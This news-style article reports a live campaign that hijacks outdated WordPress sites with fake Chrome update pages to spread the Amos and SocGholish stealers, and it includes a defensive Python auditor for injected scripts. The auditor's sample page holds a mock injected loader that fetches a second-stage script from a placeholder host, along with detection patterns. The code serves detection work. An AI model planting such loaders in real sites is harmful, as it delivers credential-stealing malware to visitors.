Cybercriminals Exploit WordPress to Distribute Malware for Windows and Mac


Understanding the Ongoing Cyber Threat: Hackers Targeting Outdated WordPress Sites

In a concerning revelation, cybersecurity researchers have uncovered a widespread hacking campaign that exploits outdated versions of WordPress and its plugins. This nefarious operation aims to alter thousands of websites, tricking unsuspecting visitors into downloading and installing harmful malware. Simon Wijckmans, CEO of the cybersecurity firm c/side, disclosed the details of this ongoing threat to TechCrunch, emphasizing that the campaign is still “very much live.”

The Scope of the Attack

The primary objective of these hackers is to disseminate malware that steals sensitive information, such as passwords and personal data, from users on both Windows and Mac operating systems. Alarmingly, some of the compromised websites are among the most visited on the internet. As Himanshu Anand, an analyst at c/side, explained, this is a “widespread and very commercialized attack.” Unlike targeted campaigns that focus on specific individuals or organizations, this hacking scheme operates as a “spray and pray” approach, aiming to ensnare any user who visits the affected sites.

How the Attack Works

When a user visits a hacked WordPress site, the content is swiftly altered to display a fake Chrome browser update page. This deceptive page urges users to download and install a supposed update to continue viewing the website. If a user falls for this ruse and accepts the update, they are then prompted to download a malicious file disguised as the update, which varies depending on whether the user is on a Windows PC or a Mac. This method capitalizes on the trust users place in their browsers and the urgency created by the fake update notification.
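A defender-side check that follows from the mechanism just described: because the lure is delivered by script injected into the site's own pages, a site owner or incident responder can audit a page's HTML for script loads that do not belong to the site and for inline scripts that pull in further code at runtime. The following is an added example, not code from c/side or from the article; the site name, the allowlist, the heuristic marker strings and the sample HTML are all constructed for illustration and are not indicators from the campaign.

```python
"""Audit a WordPress page's HTML for script sources that do not belong to
the site. Allowlist, marker strings and sample HTML are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the hypothetical site legitimately loads JavaScript from (assumed).
ALLOWED_SCRIPT_HOSTS = {"www.example-site.test", "cdn.example-site.test"}

# Inline-script patterns that mirror page-rewriting behaviour (a script that
# loads a further script, or replaces the visible page). These are generic
# heuristics, not a signature for any specific campaign.
SUSPICIOUS_INLINE_MARKERS = (
    "createElement('script'",
    'createElement("script"',
    "document.body.innerHTML",
    "document.write(",
)


class ScriptCollector(HTMLParser):
    """Collects <script src> URLs and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (kind, detail) findings for a page's HTML.

    kind is "external" for a script loaded from a host outside the allowlist,
    or "inline" for an inline script carrying a suspicious marker. Relative
    URLs are same-origin and are not flagged."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host and host.lower() not in allowed_hosts:
            findings.append(("external", src))
    for body in parser.inline:
        # Compare with whitespace removed so spacing tricks do not evade it.
        compact = "".join(body.split())
        if any("".join(m.split()) in compact for m in SUSPICIOUS_INLINE_MARKERS):
            findings.append(("inline", body.strip()[:80]))
    return findings


# Constructed sample page: one legitimate CDN script, one same-origin script,
# one injected third-party loader, and one inline script that adds a further
# script element at runtime. The .invalid domain is a placeholder.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example-site.test/theme.js"></script>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://injected.example.invalid/loader.js"></script>
</head><body>
<p>Welcome</p>
<script>
var s = document.createElement('script');
s.src = 'https://injected.example.invalid/stage2.js';
document.head.appendChild(s);
</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_scripts(SAMPLE_HTML):
        print(f"[{kind}] {detail}")
```

Run it against the HTML as a visitor actually receives it (fetched over HTTP, not read from the theme files on disk), since the injected content may be added by a compromised plugin at render time; the same-origin scripts are deliberately not flagged, so a tampered local file still needs a separate integrity check against a known-good copy.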

Alerting the Authorities

Following the discovery of this malicious activity, c/side informed Automattic, the company behind WordPress.com, about the hacking campaign and provided them with a list of identified malicious domains. While Automattic acknowledged receiving the report, they did not provide a comment prior to publication. Afterward, a spokesperson stated that the security of third-party plugins ultimately rests with the developers of those plugins. The spokesperson emphasized the importance of adhering to specific guidelines set forth in the Plugin Handbook, which addresses various security topics and best practices for maintaining user safety.

The Scale of the Compromise

c/side has reported identifying over 10,000 websites that appear to have been compromised as part of this hacking campaign. By crawling the internet and conducting reverse DNS lookups, the researchers were able to uncover additional domains hosting the malicious scripts. While TechCrunch could not verify the exact figures presented by c/side, one hacked WordPress site was confirmed to still be displaying malicious content as of Tuesday, illustrating the urgency of addressing this issue.

The Malware in Action

The two primary types of malware being propagated through these compromised websites are known as Amos (or Amos Atomic Stealer) for macOS users, and SocGholish for Windows users. According to a report released by cybersecurity firm SentinelOne in May 2023, Amos is categorized as an infostealer, designed to infiltrate computers and extract sensitive data, including usernames, passwords, session cookies, and crypto wallets. This data allows hackers to further infiltrate victims’ accounts and unlawfully access their digital assets.

Insights from Cybersecurity Experts

Patrick Wardle, a macOS security expert and co-founder of DoubleYou, an Apple-focused cybersecurity startup, characterized Amos as “definitively the most prolific stealer on macOS.” He explained that it operates under the malware-as-a-service model, where developers sell the malware to hackers who then deploy it. Wardle also highlighted that, for the malicious file identified by c/side to install successfully on a macOS device, the user must manually run it and navigate several security hurdles set by Apple, which provides a layer of defense against such attacks.

The Importance of Vigilance

While the tactics employed in this hacking campaign may not be the most sophisticated, they serve as a stark reminder for users to exercise caution. The reliance on social engineering—tricking users into believing they need to update their software—demonstrates the need for vigilance when handling software updates. It is advisable to use built-in software update features in browsers and to download applications only from trusted sources.

The Broader Implications of Password Theft

Password-stealing malware has been implicated in some of the largest data breaches in history. For instance, in 2024, hackers launched a mass raid on the accounts of major corporations using passwords stolen from employees of customers of the cloud computing giant Snowflake. This highlights the critical importance of maintaining strong cybersecurity practices to safeguard sensitive data and prevent unauthorized access to systems.

Conclusion

The ongoing hacking campaign targeting outdated WordPress sites underscores the critical need for website owners to keep their systems updated and secure. As cyber threats continue to evolve, users must remain vigilant and proactive in protecting their personal information. Regularly updating software, utilizing strong passwords, and being cautious of unsolicited prompts to download updates are essential practices in mitigating the risk of falling victim to such attacks. By staying informed and taking necessary precautions, individuals and organizations can better shield themselves against the ever-present threat of cybercrime.